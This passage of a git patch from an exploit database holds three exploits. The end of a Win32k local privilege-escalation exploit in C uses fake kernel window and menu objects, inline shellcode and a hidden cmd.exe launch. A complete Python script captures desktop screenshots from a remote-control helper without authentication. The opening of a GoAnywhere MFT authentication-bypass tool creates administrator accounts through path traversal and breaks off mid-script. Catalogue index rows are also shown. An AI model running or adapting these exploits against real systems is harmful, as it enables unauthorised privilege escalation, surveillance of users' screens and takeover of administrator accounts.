(ULONGLONG)0x304140 + 0x230; + ptagWNDFake[69] = (ULONGLONG)0x304140 + 0x28; + ptagWNDFake[70] = (ULONGLONG)0x304140 + 0x30; + ptagWNDFake[71] = (ULONGLONG)0x000004; + + + ptagWNDFake1 = (PULONGLONG)((PBYTE)0x305300); + ptagWNDFake1[1] = (ULONGLONG)0x11; + ptagWNDFake1[2] = (ULONGLONG)0x305320; + ptagWNDFake1[6] = (ULONGLONG)0x1000000000020000; + ptagWNDFake1[8] = (ULONGLONG)0x00000000029d0000; + ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120; + + + ptagWNDFake1[14] = (ULONGLONG)0x306500; + ptagWNDFake1[16] = (ULONGLONG)305400; + + + ptagWNDFake2 = (PULONGLONG)((PBYTE)0x306500); + ptagWNDFake1[11] = (ULONGLONG)0x306600; + + + + WNDCLASSEX WndClass = { 0 }; + WndClass.cbSize = sizeof(WNDCLASSEX); + WndClass.lpfnWndProc = DefWindowProc; + WndClass.style = CS_VREDRAW | CS_HREDRAW; + WndClass.cbWndExtra = 0xe0; + WndClass.hInstance = NULL; + WndClass.lpszMenuName = NULL; + WndClass.lpszClassName = L"NormalClass"; + + RegisterClassEx(&WndClass); + + for (int i = 0; i < 0x200; i++) + { + HMENUL_list[i] = CreateMenu(); + } + for (int i = 0; i < 0x100; i++) + { + HWND_list[i] = CreateWindowEx(NULL, L"NormalClass", NULL, +WS_VISIBLE, 0, 0, 0, 0, NULL, HMENUL_list[i], NULL, NULL); + + } + for (int i = 0; i < 0x100; i++) + { + + + SetWindowLongPtr(HWND_list[i], 0x58, (LONG_PTR)0x0002080000000000); + + SetWindowLongPtr(HWND_list[i], 0x80, (LONG_PTR)0x0000303030000000); + + } + + + for (int i = 0x20; i < 0x60; i++) + { + if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], +0x01)- (ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 - 1], +0x01)== 0x250) + { + if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 + +1], 0x01)-(ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], 0x01) +== 0x250) + { + HWND_add = +(ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i*2], 0x01); + max = i * 2; + break; + } + } + if (i == 0x5f) + { + HWND_add = 0; + } + + } + + ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120; + + + DestroyWindow(HWND_list[max]); + + createclass(); + + + + // Create a fake spmenu + PVOID hHeap = (PVOID)0x302000; + + g_pFakeMenu = (tagMENU*)(PVOID)0x302000; + g_pFakeMenu->ref = (PVOID)0x302300; + *(PULONG64)g_pFakeMenu->ref = (ULONG64)g_pFakeMenu; + // cItems = 1 + g_pFakeMenu->obj28 = (PVOID)0x302200; + *(PULONG64)((PBYTE)g_pFakeMenu->obj28 + 0x2C) = 1; + // rgItems + g_pFakeMenu->rgItems = (PVOID)0x304000; + // cx / cy must > 0 + g_pFakeMenu->flag1 = 1; + g_pFakeMenu->flag2 = 1; + g_pFakeMenu->cxMenu = 1; + g_pFakeMenu->cyMenu = 1; + + + // + +} +int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR +lpCmdLine, int nCmdShow) +{ + ULONGLONG gsValue = 0; + unsigned char shellcode[] = +"\x65\x48\x8B\x04\x25\x30\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\xc3"; + + LPVOID executableMemory = VirtualAlloc(NULL, sizeof(shellcode), +MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + if (executableMemory == NULL) { + return 1; + } + memcpy(executableMemory, shellcode, sizeof(shellcode)); + + gsValue = ((ULONGLONG(*)())executableMemory)(); + gsValue = gsValue + 0x800; + GS_hanlde = (PULONGLONG)(PBYTE)gsValue; + GS_off = GS_hanlde[5]; + + char str[0xb8] = ""; + memset(str, 0x41, 0xa8); + g_NtUserEnableMenuItem = +(NtUserEnableMenuItem)GetProcAddress(GetModuleHandleA("win32u.dll"), +"NtUserEnableMenuItem"); + g_NtUserSetClassLongPtr = +(NtUserSetClassLongPtr)GetProcAddress(GetModuleHandleA("win32u.dll"), +"NtUserSetClassLongPtr"); + g_NtUserCreateAcceleratorTable = +(NtUserCreateAcceleratorTable)GetProcAddress(GetModuleHandleA("win32u.dll"), +"NtUserCreateAcceleratorTable"); + g_pfnNtUserConsoleControl = +(fnNtUserConsoleControl)GetProcAddress(GetModuleHandleA("win32u.dll"), +"NtUserConsoleControl"); + + WNDCLASS wc = { 0 }; + + wc.lpfnWndProc = WndProc; + wc.hInstance = hInstance; + wc.lpszClassName = TEXT("EnableMenuItem"); + + RegisterClass(&wc); + + HWND hWnd = CreateWindow( + wc.lpszClassName, + TEXT("EnableMenuItem"), + WS_OVERLAPPEDWINDOW, + CW_USEDEFAULT, + CW_USEDEFAULT, + 400, 300, + NULL, + NULL, + hInstance, + NULL + ); + + if (!hWnd) return FALSE; + + /// + + + hSystemMenu = GetSystemMenu(hWnd, FALSE); + + hSubMenu = CreatePopupMenu(); + MENU_add = GetMenuHandle(hSubMenu); + hMenuB = CreateMenu(); + + buildmem(); + if (HWND_add == 0) + { + return 0; + } + + + AppendMenu(hSubMenu, MF_STRING, 0x2061, TEXT("0")); + AppendMenu(hSubMenu, MF_STRING, 0xf060, TEXT("1")); + + DeleteMenu(hSystemMenu, SC_CLOSE, MF_BYCOMMAND); + + AppendMenu(hMenuB, MF_POPUP, (UINT_PTR)hSubMenu, L"Menu A"); + + AppendMenu(hSystemMenu, MF_POPUP, (UINT_PTR)hMenuB, L"Menu B"); + + + + ShowWindow(hWnd, nCmdShow); + UpdateWindow(hWnd); + + flag = 1; + g_NtUserEnableMenuItem(hSystemMenu, 0xf060, 0x01); + + exploit(); + + MSG msg = { 0 }; + + while (GetMessage(&msg, NULL, 0, 0)) + { + TranslateMessage(&msg); + DispatchMessage(&msg); + } + + return (int)msg.wParam; +} + +LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM +lParam) +{ + switch (message) + { + case WM_DESTROY: + PostQuitMessage(0); + return 0; + case 0xae: + switch (wParam) + { + case 0x1000: + if (flag) + { + int itemCount = GetMenuItemCount(hMenuB); + + for (int i = itemCount - 1; i >= 0; i--) { + RemoveMenu(hMenuB, i, MF_BYPOSITION); + } + DestroyMenu(hSubMenu); + xxReallocPopupMenu(); + } + case 0x1001: + if (flag) + { + int itemCount = GetMenuItemCount(hMenuB); + + for (int i = itemCount - 1; i >= 0; i--) { + RemoveMenu(hMenuB, i, MF_BYPOSITION); + } + DestroyMenu(hSubMenu); + xxReallocPopupMenu(); + } + + return 0; + } + break; + + + } + + return DefWindowProc(hWnd, message, wParam, lParam); +} +int syytem() +{ + SECURITY_ATTRIBUTES sa; + HANDLE hRead, hWrite; + byte buf[40960] = { 0 }; + STARTUPINFOW si; + PROCESS_INFORMATION pi; + DWORD bytesRead; + RtlSecureZeroMemory(&si, sizeof(si)); + RtlSecureZeroMemory(&pi, sizeof(pi)); + RtlSecureZeroMemory(&sa, sizeof(sa)); + int br = 0; + sa.nLength = sizeof(SECURITY_ATTRIBUTES); + sa.lpSecurityDescriptor = NULL; + sa.bInheritHandle = TRUE; + if (!CreatePipe(&hRead, &hWrite, &sa, 0)) + { + return -3; + } + + si.cb = sizeof(STARTUPINFO); + GetStartupInfoW(&si); + si.hStdError = hWrite; + si.hStdOutput = hWrite; + si.wShowWindow = SW_HIDE; + si.lpDesktop = L"WinSta0\\Default"; + si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; + wchar_t cmd[4096] = { L"cmd.exe" }; + + if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, +&pi)) + { + CloseHandle(hWrite); + CloseHandle(hRead); + printf("[!] CreateProcessW Failed![%lx]\n", GetLastError()); + return -2; + } + CloseHandle(hWrite); + +} \ No newline at end of file diff --git a/exploits/windows/remote/52300.py b/exploits/windows/remote/52300.py new file mode 100755 index 000000000..82f027873 --- /dev/null +++ b/exploits/windows/remote/52300.py @@ -0,0 +1,61 @@ +# Exploit Title: Windows 2024.15 - Unauthenticated Desktop Screenshot Capture +# Date: 2025-05-19 +# Exploit Author: Chokri Hammedi +# Vendor Homepage: https://rs.ltd +# Software Link: https://rs.ltd/latest.php?os=win +# Version: 2024.15 +# Tested on: Windows 10/11 with Remote for Windows (helper) + +''' +Description: +- Exploits the getScreenshot API endpoint in Remote for Windows helper +service +- Works when "Allow unknown devices" setting is enabled (default: disabled) +- Captures current desktop including login screens (SYSTEM-level access) + +Vulnerable Component: +- /api/getScreenshot endpoint with missing authentication checks + + +# Identification: +nmap -p- -T4 --script ssl-cert +Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US +''' + +#!/usr/bin/env python3 + +import requests +import sys +from urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) + +def capture_screenshot(ip, port, output_file): + try: + response = requests.get( + f"https://{ip}:{port}/api/getScreenshot", + headers={ + "X-ClientToken": "exploit", + "X-HostName": "attacker-pc", + "X-HostFullModel": "exploit-device" + }, + verify=False, + timeout=15 + ) + if response.status_code == 200 and +response.content.startswith(b'\xff\xd8'): + with open(output_file, 'wb') as f: + f.write(response.content) + print(f"[+] Saved: {output_file}") + return True + print(f"[-] Failed: HTTP {response.status_code}") + return False + except Exception as e: + print(f"[-] Error: {str(e)}") + return False + +if __name__ == "__main__": + if len(sys.argv) < 4: + print(f"Usage: {sys.argv[0]} ") + sys.exit(1) + sys.exit(0 if capture_screenshot(sys.argv[1], sys.argv[2], sys.argv[3]) +else 1) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 937480489..29175d14f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5550,6 +5550,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 33254,exploits/java/webapps/33254.txt,"IBM Lotus Connections 2.0.1 - 'simpleSearch.do' Cross-Site Scripting",2009-09-23,IBM,webapps,java,,2009-09-23,2014-05-09,1,CVE-2009-3469;OSVDB-58320,,,,,https://www.securityfocus.com/bid/36513/info 31438,exploits/java/webapps/31438.txt,"IBM Rational ClearQuest 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2008-03-19,sasquatch,webapps,java,,2008-03-19,2014-02-06,1,CVE-2007-4592;OSVDB-43356,,,,,https://www.securityfocus.com/bid/28296/info 36299,exploits/java/webapps/36299.txt,"Infoblox NetMRI 6.2.1 - Admin Login Page Multiple Cross-Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",webapps,java,,2011-11-11,2015-03-06,1,,,,,,https://www.securityfocus.com/bid/50646/info +52304,exploits/java/webapps/52304.py,"Java-springboot-codebase 1.1 - Arbitrary File Read",2025-05-25,d3sca,webapps,java,,2025-05-25,2025-05-25,0,CVE-2025-46822,,,,, 36971,exploits/java/webapps/36971.txt,"JavaBB 0.99 - 'userId' Cross-Site Scripting",2012-03-18,sonyy,webapps,java,,2012-03-18,2015-05-09,1,,,,,,https://www.securityfocus.com/bid/52545/info 36828,exploits/java/webapps/36828.txt,"JaWiki - 'versionNo' Cross-Site Scripting",2012-02-17,sonyy,webapps,java,,2012-02-17,2015-04-27,1,,,,,,https://www.securityfocus.com/bid/52060/info 37033,exploits/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 - 'domain' Cross-Site Scripting",2012-04-02,"Dawid Golak",webapps,java,,2012-04-02,2015-05-17,1,,,,,,https://www.securityfocus.com/bid/52845/info @@ -10425,6 +10426,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 52191,exploits/multiple/hardware/52191.py,"ZTE ZXHN H168N 3.1 - Remote Code Execution (RCE) via authentication bypass",2025-04-14,"tasos meletlidis",hardware,multiple,,2025-04-14,2025-04-14,0,,,,,, 11651,exploits/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation",2010-03-07,kingcope,local,multiple,,2010-03-06,,1,,,,,, 51849,exploits/multiple/local/51849.py,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc",2024-03-03,"George Washington",local,multiple,,2024-03-03,2024-03-03,0,,,,,, +52306,exploits/multiple/local/52306.txt,"ABB Cylon Aspect Studio 3.08.03 - Binary Planting",2025-05-25,LiquidWorm,local,multiple,,2025-05-25,2025-05-25,0,CVE-2024-13946,,,,, 38835,exploits/multiple/local/38835.py,"abrt (Centos 7.1 / Fedora 22) - Local Privilege Escalation",2015-12-01,rebel,local,multiple,,2015-12-01,2018-11-17,1,CVE-2015-5287;CVE-2015-5273;OSVDB-130747;OSVDB-130746;OSVDB-130745;OSVDB-130609,,,http://www.exploit-db.com/screenshots/idlt39000/screen-shot-2015-12-03-at-40702-pm.png,, 30666,exploits/multiple/local/30666.txt,"ACE Stream Media 2.1 - 'acestream://' Format String",2014-01-03,LiquidWorm,local,multiple,,2014-01-07,2014-01-07,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5165.php 19139,exploits/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",local,multiple,,2012-06-14,2012-06-14,0,OSVDB-81754;CVE-2012-0780,,,,, @@ -10619,6 +10621,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 22327,exploits/multiple/remote/22327.txt,"3Com SuperStack 3 Firewall - Content Filter Bypassing",2003-03-05,bit_logic,remote,multiple,,2003-03-05,2012-10-28,1,,,,,,https://www.securityfocus.com/bid/7021/info 31921,exploits/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",remote,multiple,,2008-06-16,2014-02-26,1,CVE-2008-2822;OSVDB-46155,,,,,https://www.securityfocus.com/bid/29749/info 32167,exploits/multiple/remote/32167.txt,"8E6 Technologies R3000 - Host Header Internet Filter Security Bypass",2008-08-05,nnposter,remote,multiple,,2008-08-05,2014-03-11,1,CVE-2008-3494;OSVDB-47517,,,,,https://www.securityfocus.com/bid/30541/info +52305,exploits/multiple/remote/52305.py,"ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation",2025-05-25,LiquidWorm,remote,multiple,,2025-05-25,2025-05-25,0,CVE-n/a,,,,, 25019,exploits/multiple/remote/25019.txt,"ABC2MIDI 2004-12-04 - Multiple Stack Buffer Overflow Vulnerabilities",2004-12-15,"Limin Wang",remote,multiple,,2004-12-15,2013-04-30,1,CVE-2004-1256;OSVDB-12426,,,,,https://www.securityfocus.com/bid/12019/info 25018,exploits/multiple/remote/25018.txt,"ABC2MTEX 1.6.1 - Process ABC Key Field Buffer Overflow",2004-12-15,"Limin Wang",remote,multiple,,2004-12-15,2013-04-30,1,,,,,,https://www.securityfocus.com/bid/12018/info 32382,exploits/multiple/remote/32382.txt,"Accellion File Transfer Appliance Error Report Message - Open Email Relay",2008-09-15,"Eric Beaulieu",remote,multiple,,2008-09-15,2014-03-20,1,CVE-2008-7012;OSVDB-48242,,,,,https://www.securityfocus.com/bid/31178/info @@ -10994,6 +10997,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 19903,exploits/multiple/remote/19903.txt,"Gossamer Threads DBMan 2.0.4 - DBMan Information Leakage",2000-05-05,"Black Watch Labs",remote,multiple,,2000-05-05,2012-07-17,1,CVE-2000-0381;OSVDB-306,,,,,https://www.securityfocus.com/bid/1178/info 39292,exploits/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing Man In The Middle Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",remote,multiple,,2014-08-26,2018-01-11,1,CVE-2014-5380;OSVDB-110460,,,,,https://www.securityfocus.com/bid/69390/info 39293,exploits/multiple/remote/39293.pl,"Granding MA300 - Weak Pin Encryption Brute Force",2014-08-26,"Eric Sesterhenn",remote,multiple,,2014-08-26,2016-01-22,1,CVE-2014-5381;OSVDB-110456,,,,,https://www.securityfocus.com/bid/69390/info +52303,exploits/multiple/remote/52303.py,"Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow",2025-05-25,Pepelux,remote,multiple,,2025-05-25,2025-05-25,0,CVE-2022-2070,,,,, 33203,exploits/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x - WHERE Clause Security Bypass",2009-09-02,"Johannes Dahse",remote,multiple,,2009-09-02,2014-05-06,1,CVE-2008-6992;OSVDB-48910,,,,,https://www.securityfocus.com/bid/36209/info 38049,exploits/multiple/remote/38049.txt,"Greenstone - Multiple Vulnerabilities",2012-11-23,AkaStep,remote,multiple,,2012-11-23,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/56662/info 31912,exploits/multiple/remote/31912.txt,"GSC Client 1.00 2067 - Privilege Escalation",2008-06-14,"Michael Gray",remote,multiple,,2014-04-09,2014-04-09,0,CVE-2008-7170;OSVDB-53482,,,,,https://www.securityfocus.com/bid/29718/info @@ -12508,6 +12512,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49252,exploits/multiple/webapps/49252.txt,"WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download",2020-12-14,Wadeek,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,, 33937,exploits/multiple/webapps/33937.txt,"WordPress Plugin TYPO3 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,webapps,multiple,,2010-05-05,2016-09-26,1,,,,,,https://www.securityfocus.com/bid/39926/info 52137,exploits/multiple/webapps/52137.txt,"WordPress User Registration & Membership Plugin 4.1.1 - Unauthenticated Privilege Escalation",2025-04-08,"Al Baradi Joy",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,, +52302,exploits/multiple/webapps/52302.py,"WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass",2025-05-25,"Mohammed Idrees Banyamer",webapps,multiple,,2025-05-25,2025-05-25,0,CVE-2025-2594,,,,, 37573,exploits/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",webapps,multiple,,2012-08-06,2015-07-11,1,,,,,,https://www.securityfocus.com/bid/54812/info 40134,exploits/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Cross-Site Request Forgery (Add Advanced Admin)",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5341.php 40135,exploits/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php @@ -41375,6 +41380,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 6705,exploits/windows/local/6705.txt,"Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation",2008-10-08,"Cesar Cerrudo",local,windows,,2008-10-07,2018-12-18,1,,,2008-Churrasco.zip,,, 35936,exploits/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070)",2015-01-29,KoreLogic,local,windows,,2015-01-29,2015-01-29,0,CVE-2014-4076;OSVDB-114532;MS14-070,,,,, 37755,exploits/windows/local/37755.c,"Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",local,windows,,2015-08-15,2016-10-27,0,CVE-2014-4076;OSVDB-114532;MS14-070,,,http://www.exploit-db.com/screenshots/idlt38000/ms14-070.jpg,, +52301,exploits/windows/local/52301.c,"Microsoft Windows Server 2016 - Win32k Elevation of Privilege",2025-05-25,"Milad karimi",local,windows,,2025-05-25,2025-05-25,0,CVE-2023-29336,,,,, 43962,exploits/windows/local/43962.c,"Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation",2018-02-02,"Saar Amar",local,windows,,2018-02-02,2018-02-02,1,CVE-2018-0743,Local,,,,https://raw.githubusercontent.com/saaramar/execve_exploit/master/exploit.c 353,exploits/windows/local/353.c,"Microsoft Windows Task Scheduler (XP/2000) - '.job' (MS04-022)",2004-07-18,anonymous,local,windows,,2004-07-17,2019-03-28,1,OSVDB-7798;CVE-2004-0212;MS04-022,,,,, 38200,exploits/windows/local/38200.txt,"Microsoft Windows Task Scheduler - 'DeleteExpiredTaskAfter' File Deletion Privilege Escalation",2015-09-15,"Google Security Research",local,windows,,2015-09-15,2015-09-15,1,CVE-2015-2525;OSVDB-127204,,,,,https://code.google.com/p/google-security-research/issues/detail?id=442 @@ -45934,6 +45940,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41073,exploits/windows/remote/41073.py,"WinaXe Plus 8.7 - Remote Buffer Overflow",2017-01-16,"Peter Baris",remote,windows,,2017-01-16,2017-01-16,1,,,,http://www.exploit-db.com/screenshots/idlt41500/screen-shot-2017-01-16-at-152056.png,http://www.exploit-db.comwinaxep.exe, 16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,, 51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,, +52300,exploits/windows/remote/52300.py,"Windows 2024.15 - Unauthenticated Desktop Screenshot Capture",2025-05-25,"Chokri Hammedi",remote,windows,,2025-05-25,2025-05-25,0,CVE-n/a,,,,, 30169,exploits/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,remote,windows,,2007-06-11,2013-12-10,1,CVE-2007-3201;OSVDB-41727,,,,,https://www.securityfocus.com/bid/24412/info 16529,exploits/windows/remote/16529.rb,"WinDVD7 - 'IASystemInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2007-0348;OSVDB-34315,"Metasploit Framework (MSF)",,,, 7875,exploits/windows/remote/7875.pl,"WinFTP Server 2.3.0 - 'LIST' (Authenticated) Remote Buffer Overflow",2009-01-26,"joe walko",remote,windows,21,2009-01-25,2016-09-27,1,OSVDB-51667;CVE-2009-0351,,,,, From c3b152279e29d5427af997886003f9873a9caf95 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Fri, 30 May 2025 00:16:26 +0000 Subject: [PATCH 5/6] DB: 2025-05-30 7 changes to exploits/shellcodes/ghdb Automic Agent 24.3.0 HF4 - Privilege Escalation Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal Campcodes Online Hospital Management System 1.0 - SQL Injection WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure --- exploits/multiple/remote/52308.py | 338 +++++++++++++++++++++++ exploits/multiple/remote/52309.txt | 13 + exploits/multiple/remote/52311.py | 408 ++++++++++++++++++++++++++++ exploits/multiple/webapps/52307.txt | 74 +++++ exploits/multiple/webapps/52312.txt | 72 +++++ exploits/windows/remote/52310.py | 85 ++++++ files_exploits.csv | 6 + 7 files changed, 996 insertions(+) create mode 100755 exploits/multiple/remote/52308.py create mode 100644 exploits/multiple/remote/52309.txt create mode 100755 exploits/multiple/remote/52311.py create mode 100644 exploits/multiple/webapps/52307.txt create mode 100644 exploits/multiple/webapps/52312.txt create mode 100755 exploits/windows/remote/52310.py diff --git a/exploits/multiple/remote/52308.py b/exploits/multiple/remote/52308.py new file mode 100755 index 000000000..8c18d1786 --- /dev/null +++ b/exploits/multiple/remote/52308.py @@ -0,0 +1,338 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# Exploit Title: Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass +# Date: 2025-05-25 +# Exploit Author: @ibrahimsql +# Exploit Author's github: https://github.com/ibrahimsql +# Vendor Homepage: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft +# Software Link: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft/free-trial +# Version: < 7.4.1 +# Tested on: Kali Linux 2024.1 +# CVE: CVE-2024-0204 +# Description: +# Fortra GoAnywhere MFT versions prior to 7.4.1 contain a critical authentication bypass vulnerability +# that allows unauthenticated attackers to create an administrator account by exploiting a path traversal +# vulnerability to access the initial account setup wizard. This exploit demonstrates two different +# path traversal techniques to maximize successful exploitation across various server configurations. +# +# References: +# - https://old.rapid7.com/blog/post/2024/01/23/etr-cve-2024-0204-critical-authentication-bypass-in-fortra-goanywhere-mft/ +# - https://www.tenable.com/blog/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-vulnerability +# - https://nvd.nist.gov/vuln/detail/cve-2024-0204 + +import argparse +import concurrent.futures +import os +import socket +import sys +from typing import List, Dict, Tuple, Optional, Union + +import requests +from bs4 import BeautifulSoup +from colorama import Fore, Style, init + +# Initialize colorama for cross-platform colored output +init(autoreset=True) + +# Disable SSL warnings +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) + +# Constants +DEFAULT_TIMEOUT = 10 +MAX_THREADS = 10 +USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" +PRIMARY_EXPLOIT_PATH = "/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml" +SECONDARY_EXPLOIT_PATH = "/goanywhere/..;/wizard/InitialAccountSetup.xhtml" + + +class Banner: + @staticmethod + def show(): + banner = f"""{Fore.CYAN} + ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ +██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ██╔═████╗╚════██╗██╔═████╗██║ ██║ +██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗██║██╔██║ █████╔╝██║██╔██║███████║ +██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝████╔╝██║██╔═══╝ ████╔╝██║╚════██║ +╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ╚██████╔╝███████╗╚██████╔╝ ██║ + ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚═╝ +{Style.RESET_ALL} +{Fore.GREEN}CVE-2024-0204 Exploit v1.0{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql{Style.RESET_ALL} +""" + print(banner) + + +class GoAnywhereExploit: + def __init__(self, username: str, password: str, timeout: int = DEFAULT_TIMEOUT): + self.username = username + self.password = password + self.timeout = timeout + self.headers = {"User-Agent": USER_AGENT} + self.vulnerable_targets = [] + self.non_vulnerable_targets = [] + self.error_targets = [] + + def check_target(self, target: str) -> Dict: + """ + Check if target is vulnerable to CVE-2024-0204 and attempt to create an admin account + + Args: + target: The target URL/domain to check + + Returns: + Dict containing result information + """ + result = { + "target": target, + "vulnerable": False, + "message": "", + "admin_created": False, + "error": None + } + + # Try primary exploit path first + primary_result = self._try_exploit_path(target, PRIMARY_EXPLOIT_PATH) + if primary_result["vulnerable"]: + return primary_result + + # If primary path failed, try secondary exploit path + print(f"{Fore.BLUE}[*] {Style.RESET_ALL}Primary exploit path failed, trying alternative path...") + secondary_result = self._try_exploit_path(target, SECONDARY_EXPLOIT_PATH) + if secondary_result["vulnerable"]: + return secondary_result + + # If both paths failed, target is not vulnerable + print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Not vulnerable to CVE-2024-0204") + result["message"] = "Not vulnerable to CVE-2024-0204" + self.non_vulnerable_targets.append(target) + return result + + def _try_exploit_path(self, target: str, exploit_path: str) -> Dict: + """ + Try to exploit the target using a specific exploit path + + Args: + target: Target to exploit + exploit_path: Path to use for exploitation + + Returns: + Dict with exploitation results + """ + result = { + "target": target, + "vulnerable": False, + "message": "", + "admin_created": False, + "error": None + } + + try: + url = f"https://{target}{exploit_path}" + session = requests.Session() + + # Initial check for vulnerability + response = session.get( + url, + headers=self.headers, + verify=False, + timeout=self.timeout + ) + + # Determine if target is vulnerable based on response + if response.status_code == 401: + print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Not vulnerable via {exploit_path} (401 Unauthorized)") + result["message"] = "Not vulnerable (401 Unauthorized)" + return result + + if response.status_code != 200: + print(f"{Fore.YELLOW}[?] {Style.RESET_ALL}{target} - Unexpected response via {exploit_path} (Status: {response.status_code})") + result["message"] = f"Unexpected response (Status: {response.status_code})" + return result + + # Target is potentially vulnerable + print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{target} - Potentially vulnerable via {exploit_path}!") + result["vulnerable"] = True + self.vulnerable_targets.append(target) + + # Extract ViewState token for the form submission + try: + soup = BeautifulSoup(response.text, "html.parser") + view_state = soup.find('input', {'name': 'javax.faces.ViewState'}) + + if not view_state or not view_state.get('value'): + print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Could not extract ViewState token via {exploit_path}") + result["message"] = "Could not extract ViewState token" + return result + + # Prepare data 